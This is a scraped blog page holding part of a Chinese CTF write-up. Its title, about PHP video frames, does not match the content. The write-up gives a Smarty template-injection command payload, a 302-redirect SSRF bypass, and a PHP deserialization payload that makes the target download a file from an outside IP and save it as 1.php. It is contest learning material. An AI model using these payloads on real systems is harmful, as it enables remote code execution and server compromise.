php 上传视频时截取第一针,​第一届四叶草网络安全学院牛年CTF大赛部分WriteUp...

最新推荐文章于 2022-07-27 11:37:21 发布
最新推荐文章于 2022-07-27 11:37:21 发布
阅读量85 收藏
点赞数
文章标签: php 上传视频时截取第一针
本文探讨了在Smarty模板注入场景中利用GET参数获取源码,并通过302跳转实现SSRF攻击的Bypass方法。作者介绍了如何构造payload,利用Web服务读取Apache配置,以及通过反序列化技术在远程服务器上执行文件操作的过程。
摘要由CSDN通过智能技术生成

考点

smarty模板注入

思路

根据提示输入GET参数得到源码.发现为smarty模板注入

payload: ?name={if passthru ('nl fl*')}{/if}

5f4158dc82d75930606b826a66ca3305.png

★Website

考点

ssrf中使用302跳转进行bypass

思路

一开始尝试dict、file、gopher等协议,发现都被禁用了

但是可以访问其他主机,就想到用302跳转去bypass

在vps上开个web服务,内容如下

再用题目访问vps,可以看到是成功访问的

26ea4bba81c64ae16b488bdb2d85a6c2.png

接着去读取apache的配置文件

7f922772452cd2cc57dc351847a72b8d.png

7a8efa4ceeb7253f7cba2327c2b42f70.png

分别读取源码

80: web1/index.php

<?phperror_reporting (0);function check_302($url){$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 302 redirectcurl_exec($ch);$info = curl_getinfo($ch);curl_close($ch);return $info['url'];}if (isset($_GET['url'])) {$url = $_GET['url'];if (strpos($url, 'http://127.0.0.1/') === 0 || strpos($url, 'http://localhost/') === 0) {exit("

8080: web2/index.php

<?phpclass copy_file{public $path = 'upload/';public $file;public $url;function __destruct(){if(strpos($this - url,'http://127.0.0.1') === 0){file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));echo $this -> path.$this -> file." update successed!)";}else{echo "Hello CTFer";}}}if(isset($_GET['data'])){$data = $_GET['data'];unserialize($data);}else{echo "Welcome to CloverSec WebSite";}?>

然后就是反序列化了,在vps上写好代码

按照如下方式传参,上传代码

http://example.com@127.0.0.1:8080/?data=O:9:"copy_file":3:{s:4:"path";s:7:"upload/";s:4:"file";s:5:"1.php";s:3:"url";s:41:"http://127.0.0.1@81.68.218.54:20003/1.txt";}b412251ad4a71847ee152715c99600ab.png

再去访问即可看到结果

http://127.0.0.1:8080/upload/1.php

★file manager

weixin_39765290
关注
四叶草网络安全学院第一届ctf比赛题目WP
抚琴
02-26 2524
大家好关于这次比赛密码学和部分移动安全是我出的 我就是抚琴没错在这里我们来解题吧(不要吐槽我,嘴下饶人) 1 某加密算法实现如下 import java.nio.charset.Charset; public class DeEnCode { private static final String key0 = "2021.2.26"; private static final Charset charset = Charset.forName("UTF-8"); private s
php视频上传到七牛云的同截取视频15秒
qq_42573785的博客
04-03 782
七牛官方文档中也有,下面看代码 $accessKey = config('qiniu')['ak']; $secretKey = config('qiniu')['sk']; $bucket = config('qiniu')['bucket']; $persistentNotifyUrl = config('qiniu')['persistentNotifyUrl']; // ob_start(...
php 上传视频截取第一,记一次使用 AetherUpload 视频上传过程
weixin_35437039的博客
03-19 362
说明AetherUpload是提供超大文件上传的 laravel 扩展包,带百分比进度显示,支持断点续传,支持自定义中间件,基于 laravel 5 开发。我们知道,在以,文件上传采用的是直接传整个文件的方式,这种方式对付一些小文件是没有问题的。而当需要上传大文件,此种方式不仅操作繁琐,需要修改 web 服务器和后端语言的配置,而且会大量占用服务器的内存,导致服务器内存吃紧,严重的甚至传输超...
PHP 调取视频第一
a353399459的专栏
12-03 6794
背景:   小程序项目中,需要使用到获取上传视频第一帧作为封面图。查阅资料大部分介绍使用 ffmpeg 这个第三方应用。 centos下安装ffmpeg 是比较容易,这里不再赘述。 结合php 的系统函数调用来完成获取第一帧图片的方法。   由于这个项目是给多客户安装使用,当设想是否能用php扩展来解决这个问题。注:即使使用扩展,也依然需要依赖服务器环境中有ffmpeg . 一查ff...
php使用ffmpeg获取视频第一帧为缩略图
chaoyang_test的专栏
07-27 614
由于我个人使用的是php7.4的版本所以这里安装。
解决卡Win7四叶草问题.zip
08-27
1. **四叶草启动管理器**: 这是苹果电脑上用于管理多操作系统启动的程序,特别是当电脑同安装了macOS和Windows四叶草显示了一个图形界面,让用户选择要启动的操作系统。 2. **Windows 7无法启动的原因**: -...
PDF阅读器 四叶草PDF阅读器 v1.3.0.0
10-16
四叶草PDF阅读器是一款专为用户打造的高效、便捷的PDF文件查看工具,其版本号为v1.3.0.0。该软件的主要特点是体积小巧,仅占用不到5MB的磁盘空间,这对于那些关注系统资源占用的用户来说无疑是一大优势。在界面设计...
10.14 四叶草.rar
03-24
Clover Bootloader是支持macOS Mojave 10.14的四叶草Clover ,编译了PKG安装包文件请在macOS上双打开安装,CloverCD文件夹是启动引导的EFI启动文件,需要放到你的ESP分区,这个适合需要自己选配的童鞋,还有个...
四叶草黑苹果.dmg
12-24
四叶草,經典版 四叶草,經典版 非常好用的。专注于黑苹果
上传视频自动获取第一帧图片
11-20
上传视频可自动获取第一帧图片,真正实现了,还有些功能请高手完善下,比如超过1G以上的视频上传等等,现在只实现了2M大小的视频上传,其他功能没有完成。请高手完成后也共享下谢谢。
PHP截取视频第一
Follow me !
01-18 3604
安装ffmpeg 第一步:下载ffmpeg:http://ffmpeg.org/releases/ffmpeg-3.4.1.tar.bz2 第二步:解压FFMPEG===tar -jxvf ffmpeg-3.4.1.tar.bz2 第三步:cd ffmpeg-3.4.1 第四步:安装yasm ----yum install yasm 第五步:./configure --enabled-shared --prefix=/usr/local/ffmpeg 第六步:安装:make &&
[WRITEUP]第一届四叶草网络安全学院牛年CTF大赛WRITEUP
Y4tacker的博客
02-26 3573
第一届四叶草网络安全学院牛年CTF大赛WRITEUP 队伍信息战队名称 战队成员姓名:Firebasky、Y4tacker、lastsward、atao、m1n9yu3 解题情况战队排名答题情况Web WebGET 首先传?flag=1,发现似乎是smarty, 测试{$smarty.version}, 成功过滤cat,用tac发现是smarty注入简单了 那就flag={if passthru(“tac fl*”)}{/if} 即可获得flag WEBsite 首先打开页面看到接收url参数,是ssrf考
四叶草移动网络安全学习日志
qq_44365878的博客
07-25 515
四叶草学习日志 DAY_1 Android Studio之已经安装 adb使用出现 connect error for write: no devices/emulators founds 解决:手机打开usb调试 CrackeMe_clover01解题思路: 再进行反编译后发现他会在最开始进行一个用户字段的判断,如下 如果为空返回false,我让他在这直接返回true 根据这个思路,我找到了下面的返回值在源码中的表示 将v7的值由0x0改为0x1然后编译安装后,得到flag D
CTF系列】2021年2月四叶草CTF
读万卷书,行万里路。
02-27 1704
文章目录1 Web1.1 题目:GET1.2 题目:Website2 小结 四叶草网络安全学院的一次推广活动吧,正好可以试试自己的水平(问就是菜。 1 Web 1.1 题目:GET 题目描述:Hello GET_flAG!!! 题目地址:http://0bc68a13.yunyansec.com/ 根据提示输入任意的Get参数,即可查看源码。http://0bc68a13.yunyansec.com/?1 <?php include('flag.php'); include('./libs
php获取视频第一帧,PHP获取视频第一帧与
weixin_42112894的博客
03-09 540
热度2814℃//获得视频文件的缩略图function getVideoCover($file,$time,$name) {if(empty($time))$time = '1';//默认截取第一第一帧$strlen = strlen($file);// $videoCover = substr($file,0,$strlen-4);// $videoCoverName = $videoCove...
PHP 获取视频第一帧生成图片
weixin_42411512的博客
07-23 1648
ffmpeg-php扩展 php视频缩略图,较常用的是ffmpeg-php 1: 安装 ffmpeg ffmpeg的下载链接 http://ffmpeg.org/download.html 解压安装包 tar -jxvf ffmpeg-x.x.tar.bz2 进入目录 cdffmpeg-x.x 编译安装 ./configure --enable-shared && make && make install 安装完成之后 执行 ffmpeg -versi..
PHP获取视频第一帧与
热门推荐
zh_119的博客
09-20 1万+
//获得视频文件的缩略图 function getVideoCover($file,$time,$name) { if(empty($time))$time = '1';//默认截取第一第一帧 $strlen = strlen($file); // $videoCover = substr($file,0,$strlen-4);
php 上传视频并获取视频第一
u012955110的博客
03-17 1万+
function shipin(){     //检测是否为视频       $oldfilepath = $this->ShipinChock(); //路径   $part ="";   $name = "";   $houzhui = ".mp4";   if(!is_dir($party)){        mkdir($paty);   }  $newfilepaty
3058. 四叶草魔杖
最新发布
07-27
四叶草魔杖是一种神奇的武器,它由四件武器融合而成。当魔杖顶端生长出一棵四叶草,它会散发出七色光芒。圆盘上镶嵌着N颗宝石,每颗宝石都有不同的能量。如果宝石的能量过高,需要将能量传递给其他宝石;如果能量...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值